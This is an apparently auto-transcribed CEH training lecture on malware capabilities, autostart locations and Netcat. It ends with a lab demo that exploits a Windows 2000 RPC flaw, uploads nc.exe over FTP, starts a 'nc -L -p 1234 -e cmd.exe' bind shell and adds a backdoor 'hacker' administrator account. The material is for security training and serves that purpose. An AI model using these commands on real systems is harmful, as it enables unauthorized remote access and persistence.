EC Council CEH 312-50 – Malware – Software Goes Undercover Part 3
July 15, 2023

8. Malware Capabilities

Now, the next thing we want to talk about is malware capabilities and some of the things that malware might do. If it’s installed on your system, whether it’s known to you or perhaps not known to you, naturally it can give remote access to someone that you don’t even know that they’re doing this. Password sending whatever you type as your password, you can send it to someone else, perhaps a key logger. So whatever you type on the keyboard could be logged either to a software device or possibly a hardware device, as we talked about earlier, possibly even surveillance. In other words, watch what we’re doing. This could be done by the corporation, or it could possibly be done by some nefarious person.

Provide a denial of service attack in other words, not letting you use your information. Provide an FTP Trojan. This gives us the capability to upload software and use this perhaps as a pivot to get further into your network. And naturally, it might also kill off any software detection or antivirus that you might have so it’s not detected. There are many early infectious programs, including the first Internet worm as they were written as experiments or pranks. Today, malware is used as both black hat hackers and governments alike, primarily to steal sensitive information of personal, financial or business importance. Malware is sometimes used broadly against government or corporate websites to gather guarded information or disrupt their operation.

In general, however, malware is often used against individuals to gain personal information, such as Social Security numbers, bank or credit card numbers, and so on. Left unguarded, personal and network computers can be let at considerable risk against these threats. These are frequently counteracted by various types of firewalls, perhaps antivirus and network hardware. Since the rise of widespread broadband Internet access, malicious software has more frequently been designed for profit. The majority of widespread viruses and worms have been designed to take control of the user’s computers for black market exploitation.

Infected zombie computers are used to send spam email, to host contraband data such as child pornography, or even to engage in distributed denial of service attacks. As a form of extortion, another form of malware has emerged called spyware. These programs are designed to monitor users web browsing, display unsolicited advertisements, or Redirect affiliated marketing revenues to the spyware creator. Spyware programs do not spread like viruses. Instead, they are generally installed by exploiting security holes. They can also be packaged together with user installed software, such as peer to peer applications. Some of the best known types of malware viruses and worms are known for the manner in which they spread, rather than any specific type of behavior.

The term computer virus is used for a program that has infected some executable software and, when run, causes the virus to spread to other executables. On the other hand, a worm, as we talked about before, is a program that actively transmits itself over a network to infect other computers. These definitions lead to the observation that a virus requires user intervention to spread whereas a worm spreads automatically. One of the biggest problems that we have and why we typically get malware is we don’t practice the main point called principle of least privilege or PO LP. That simply means giving the user only the privileges that they need to do their job. Now, it’s really easy for me to sit up here and tell you that but it’s a whole lot harder to do because you have to figure out exactly what they need and then give them only those permissions.

But if you’re going to control these pieces of malware you’re going to have to do something like that. We have a huge amount of overprivileged users. Some systems allow all users to modify their internal structures. This was standard operating procedure for early microcomputer and home computer users as there was no distinction between an administrator or root and a regular user of the system. In some systems, non administrator users are overly privileged by design and since they are allowed to modify internal structures of the system in some environments users are overprivileged because they have been inappropriately granted administrator or equivalent status.

Sometimes we also have overprivileged code. Some systems allow code executed by a user to access all rights of that user. Also standard operating procedure for early microcomputer and home computer systems. Malware running as overprivileged code can use this privilege to subvert the system. Almost all currently popular operating systems and also many scripting applications allow code too many privileges usually in the sense that when the user executes the code the system allows that code all rights of that user. This makes users vulnerable to malware in the form of email attachments which may or may not be disguised.

9. Auto Starting Malware

Now naturally, once we get infected with some kind of malware, if we reboot our system, unless there is some mechanism to have it start back up, it’s simply not going to run again. So there’s different ways that malware auto starts itself. Modifications to any of these can cause malware to keep running after reboots. Like for example, system files auto exec system I and I win in registry key startup folder. Also be sure to check out the registry manually to see where it might be using it. Now today there are some pretty easy ways to find this. It’s a utility called Ms Config. And if you execute the Ms Config utility, you can typically use it to disable startup programs in the system ini and I went ahead and launched that. So here are the applications that start up when it boots.

Here services that start up. Here are applications that start up that are part of the Registry. You can see here some various tools, that kind of thing. And you’ll notice that you can uncheck all of these to see if one is causing a problem. This is the most common way of doing it these days. Now, it should also be noted that there is a tool called Hijack this. It’s a rather old tool, but it does a lot of the same type of stuff that that other tool I was just talking about did. So if you’re running on an older system, perhaps you might use something like this. It’s a tool that scans Registry and all of their system files for auto starting, Trojans inspired and you can uncheck things and the same type of thing that we talked about before.

10. Tool: Netcat

Now, the next thing I’m going to talk about is what’s often referred to as the Swiss Army Knife of hackers or penetration testers. The tool is called Netcat, and oftentimes you’ll hear it referred to as a listener. Netcat basically opens up a listening connection on a machine and it will typically even stand and in front of an already assigned port. For example, if you have a web service and you configure Netcat to listen on port 80, the next connection to port 80 Netcat will consume. So some people use it for other nefarious reasons so they can jump out in front of something. It actually is a computer networking service for reading and writing to network connections using TTP or UDP.

Netcat is designed to be a dependable back end that can be used directly or easily driven by other programs and scripts at the same time. It’s a feature rich network debugging investigation tool, since it can produce almost any kind of correlation its user could need and has a number of built in capability. This is the reason Netcat is often referred to as a Swiss Army Knife. For TCP. IP has port scanning, transferring files, port listening. It can also be used as a backdoor. The original version of Netcat was a Unix program or a Linux program. There are many implementations on Posix systems including rewrites from scratch like GNU netcat Openbsd netcat a later version which supports IP version six openbsd version has been ported to FreeBSD and Windows Side gen as well.

MacOSX users use Mac ports to install Netcat variant. There’s also a Microsoft Windows version of Netcat available. Known ports for embedding systems include versions for the Windows Ce named Netcat, four for Wind Ce for the iPhone. It has versions that run on busy box, which includes the lightweight version of Netcat. Solaris Eleven Cryptcat is a version of it that has integrated encryption capabilities. Let’s take a look real quick at some of the Netcat switches. Now the dashv switch stands for verbose, VV for very verbose. E stands for execute. In other words, whenever we make an attachment to this Netcad listener, it’s going to execute this particular program.

So it could be E CMD exe if it’s in a Windows environment, or Ebinsh for example, if it’s in a Unix environment. D is for stealth mode. N is specified when Netcat will only accept numeric IP addresses and won’t try to do DNS lookups for anything. Now, the lowercase L is to listen for the first connection, and then after it’s disconnected, it stops listening, and uppercase L will listen and allow the user to reconnect even if the connection was dropped or keep on listening. So most individuals will use the capital L unless they’re going to use it for just one time. The dash P is the port we want to attach one, and T tells Netcat to handle any telnet negotiation. U tells it to use UDP instead of TCP, and o sends its information out to a log file.

11. Demo: NetCat Procedure

Okay, so here’s the next thing I’m going to do. I’m going to give you a demonstration on how some of the netcat features actually work. I’ll first exploit a system, upload netcat to that system, put it into a listening mode, and then attach to it. Now I’m going to use an older version of Windows, Windows 2000. So please don’t think think less of me. This course is about concepts. And so this would work just as well if I used Windows Seven. But it’s just easier because I already have the exploit available for me to use in Windows 2000. This is what we’re going to do. I will give you a lab to do this on your own. And normally when I’m teaching a class, what I’ll do is I’ll have the students follow along with me and I’ll tell the students, okay, if you get lost, just don’t raise your hand because I’m not going to stop.

I’ll come around and help you because I’ll go fairly quickly and it’s easy to get lost here, but I’ll give you the capability of doing this in a lab. All right? So as a general overview what I’m going to do, I’m going to basically exploit the Windows 2000 system. I’m going to supply an FTP IP address where the IP address is that of an XP VM that I’m going to use. Supply a log into that FTP server, download my netcat executable. So I’m going to actually put in my toolbox. Just like a carpenter has his set of tools, a plumber has his set of tools. Well, a hacker has his set of tools as well. One of the most popular tools is the netcat listener, among other. So he’s going to want to upload that listener started in a listening procedure and make an attachment to it.

So we’ll go through that process and I’ll put in the various commands and then I’ll use telnet or netcat to attach to it. And I’ll verify that I’m at that machine by typing in hostname. Okay, so let’s get to it. Okay, here we are in our online lab. And I’m just going to go ahead and open up our XP attacker console. And I’m going to open up our Win two K console. So what I have here is my XP attacker and I go over to my Windows 2000 machine and I’m going to need to obtain the IP address of my Windows 2000 machine. So I’m just simply going to go in and do CMD IP config and looks like I’m 1041, 156. Okay, great. So I’m just going to go ahead and all right, so I’m going to go into my computer, drill down to my lab folders, and I’m going to utilize the utility RPC exploit GUI.

I’m just going to go ahead and launch that. And I’ll go ahead and close this. Now I’m going to launch an exploit via the RPC vulnerability that’s in Windows 2000 just to demonstrate this now guys, because remember, this course is about concept. I’m going to tell if it’s a Windows 2000. I’m going to give it its IP address, which was 1041. And we’ll click Exploit again and we’ll see what might happen. Okay? Boom, we’re in to my Windows 2000 machine. Now while you might say, okay, well great, you’re in. And let’s see if I type in who am I? I’m actually in as Ms system, which is one step above administrator. I own this box. The problem is that this shell is very unstable.

For example, if I were to press CTRL C on here, it would close this window and you would actually have to reboot the Windows 2000 machine to get it to connect again. Now if you’re breaking into somebody’s machine and you mess up, it’s probably not going to work. If you call them on the phone and say, you know what, I was breaking into your machine and I really messed up, would you mind rebooting it? That’s probably not going to work. You’re really going to have to kind of get it right the first time or wait for them to reboot and try at a later time. But we would like to have more of a stable shell. Now the stable shell I’m going to use is.

Netcat. So this little utility happens to have a little FTP server built into it. Now the FTP server is listing the IP address of our XP machine. Remember this right here is our Windows 2000 machine. So if I type in IP config right here, it’s 156. This one’s 152. All right? So the first thing I’m going to do is I’m going to go out, start the FTP system on my XP machine. I’m then here going to type in FTP space the IP address of my XP machine because remember, we’re coming back from the width of 2000 back to the XP so we can upload our toolkit. So FTP 1041, 152. All right? And then when I press Enter here, it says, okay, you connected. What is your username? Well, here’s the username asdf So I’m going to type in asdf Press Enter.

It says welcome asdf now the next thing I’m going to do is I want to upload the netcat utility. I happen to know where it is on this system. So I’m going to type in getcnetcatnc Exe and then press Enter. You notice it here. It says Finished sending file. Now again, it seems like it’s hung here. It’s really easy for you to press CTRL C and well, we only have to start all over again. But the proper procedure is to come over here, click on Stop, then over here you’re going to type the command by Bye and it releases you back to your system. Now I’m going to type in Dir. In C. EXV. And sure enough, there is the netcat listener. Now I’m going to start listening so I can connect to it. So I’m going to type in NC capital L P 1234 E CMD exe. So let’s discuss what we’re doing here.

I’m starting a netcat Listener on my Windows 2000 machine. Remember, it’s like I’m pulled up in front a chair in front of the console of the Windows 2000 machine. So I’m going to tell it I want to start a Listener on it at port 1234. And as soon as I make my attachment to that, I want it to execute command exe. Okay, great. I’m going to press enter on that and it’s going to appear kind of like it’s hung. That’s normal. Now if I go out here and open up another command prompt, I’ll just go out to the. Netcat directory and I’m going to type in MC, the IP address of the machine that’s running my Listener. Ten dot, 40 dot, one dot, 1156. Was it? I believe that’s right. Yep, space. Now I need to put in the port number 1234, press Enter and boom, I’m there.

Now I have a more stable shell and I can do things perhaps like up arrow and backspace and things like that. I still am in as Ms system, and I can do a directory or whatever else I want to do, copy files up and down. Basically, I own this box. I could basically type in net userhackerad and it adds a user called hacker. I could then say net local group administrators hacker. I’ve just added hacker to my local administrators group on that machine. I could use this as a backdoor if I wanted to or whatever else I was wanting to do, just to prove to you that that can be done. I’m going to go over to my Win two K machine. I’ll go ahead and log off of it, log on as Hacker, and if I am administrator, the first thing that’s going to come up is configure your server. And there you have it.

Leave a Reply

How It Works

img
Step 1. Choose Exam
on ExamLabs
Download IT Exams Questions & Answers
img
Step 2. Open Exam with
Avanset Exam Simulator
Press here to download VCE Exam Simulator that simulates real exam environment
img
Step 3. Study
& Pass
IT Exams Anywhere, Anytime!